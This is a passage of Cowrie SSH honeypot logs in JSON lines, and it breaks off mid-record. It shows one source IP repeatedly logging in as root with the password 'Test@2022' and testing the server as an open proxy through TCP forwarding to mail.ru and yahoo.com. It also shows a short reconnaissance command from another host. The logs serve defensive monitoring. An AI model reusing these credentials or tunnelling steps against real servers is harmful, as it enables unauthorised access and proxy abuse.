{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.157692Z","src_ip":"77.83.207.83","session":"09529a438226"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16929,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16929","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.208653Z","session":"09529a438226"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.258655Z","src_ip":"77.83.207.83","session":"09529a438226"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.283793Z","src_ip":"212.227.235.229","session":"0aa75b5e2d45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":30056,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:30056","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.400052Z","session":"09529a438226"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.449846Z","src_ip":"77.83.207.83","session":"09529a438226"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":8509,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8509","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.592115Z","session":"09529a438226"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.641793Z","src_ip":"77.83.207.83","session":"09529a438226"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.692405Z","src_ip":"77.83.207.83","session":"09529a438226"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:43:35.720618Z","src_ip":"212.227.125.160","session":"68d333c1aaf0"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.721337Z","src_ip":"212.227.125.160","session":"68d333c1aaf0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35362,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fe77f30bf38","protocol":"ssh","message":"New connection: 77.83.207.83:35362 (1.2.3.4:22) [session: 7fe77f30bf38]","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.743128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.743657Z","src_ip":"77.83.207.83","session":"7fe77f30bf38"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:35.794821Z","src_ip":"77.83.207.83","session":"7fe77f30bf38"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.050005Z","src_ip":"77.83.207.83","session":"7fe77f30bf38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11544,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11544","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.102218Z","session":"7fe77f30bf38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.153551Z","src_ip":"77.83.207.83","session":"7fe77f30bf38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":22744,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22744","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.297528Z","session":"7fe77f30bf38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.348854Z","src_ip":"77.83.207.83","session":"7fe77f30bf38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":1150,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1150","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.493568Z","session":"7fe77f30bf38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.544756Z","src_ip":"77.83.207.83","session":"7fe77f30bf38"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.597402Z","src_ip":"77.83.207.83","session":"7fe77f30bf38"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35454,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b207964f938","protocol":"ssh","message":"New connection: 77.83.207.83:35454 (1.2.3.4:22) [session: 3b207964f938]","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.646921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.647878Z","src_ip":"77.83.207.83","session":"3b207964f938"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.698709Z","src_ip":"77.83.207.83","session":"3b207964f938"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:36.950331Z","src_ip":"77.83.207.83","session":"3b207964f938"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23269,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23269","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.002214Z","session":"3b207964f938"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.052716Z","src_ip":"77.83.207.83","session":"3b207964f938"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":7998,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:7998","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.196969Z","session":"3b207964f938"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.247498Z","src_ip":"77.83.207.83","session":"3b207964f938"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":6992,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6992","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.388803Z","session":"3b207964f938"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.439502Z","src_ip":"77.83.207.83","session":"3b207964f938"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.490759Z","src_ip":"77.83.207.83","session":"3b207964f938"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35554,"dst_ip":"1.2.3.4","dst_port":22,"session":"fabf7b06d548","protocol":"ssh","message":"New connection: 77.83.207.83:35554 (1.2.3.4:22) [session: fabf7b06d548]","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.540260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.549326Z","src_ip":"77.83.207.83","session":"fabf7b06d548"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.590991Z","src_ip":"77.83.207.83","session":"fabf7b06d548"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.842814Z","src_ip":"77.83.207.83","session":"fabf7b06d548"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23756,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23756","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.894186Z","session":"fabf7b06d548"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:37.945384Z","src_ip":"77.83.207.83","session":"fabf7b06d548"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":8757,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8757","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.088900Z","session":"fabf7b06d548"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.139478Z","src_ip":"77.83.207.83","session":"fabf7b06d548"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":7223,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7223","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.280743Z","session":"fabf7b06d548"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.331293Z","src_ip":"77.83.207.83","session":"fabf7b06d548"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.383014Z","src_ip":"77.83.207.83","session":"fabf7b06d548"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35642,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba9050fc5922","protocol":"ssh","message":"New connection: 77.83.207.83:35642 (1.2.3.4:22) [session: ba9050fc5922]","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.432090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.441951Z","src_ip":"77.83.207.83","session":"ba9050fc5922"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.482621Z","src_ip":"77.83.207.83","session":"ba9050fc5922"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.733435Z","src_ip":"77.83.207.83","session":"ba9050fc5922"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3665,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3665","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.784891Z","session":"ba9050fc5922"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.835565Z","src_ip":"77.83.207.83","session":"ba9050fc5922"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":29253,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:29253","sensor":"my-vps","timestamp":"2025-08-31T03:43:38.976732Z","session":"ba9050fc5922"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.027123Z","src_ip":"77.83.207.83","session":"ba9050fc5922"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":7094,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7094","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.168667Z","session":"ba9050fc5922"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.218997Z","src_ip":"77.83.207.83","session":"ba9050fc5922"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.270268Z","src_ip":"77.83.207.83","session":"ba9050fc5922"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35729,"dst_ip":"1.2.3.4","dst_port":22,"session":"4114ec2e03d1","protocol":"ssh","message":"New connection: 77.83.207.83:35729 (1.2.3.4:22) [session: 4114ec2e03d1]","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.320030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:39.330108Z","src_ip":"77.83.207.83","session":"4114ec2e03d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-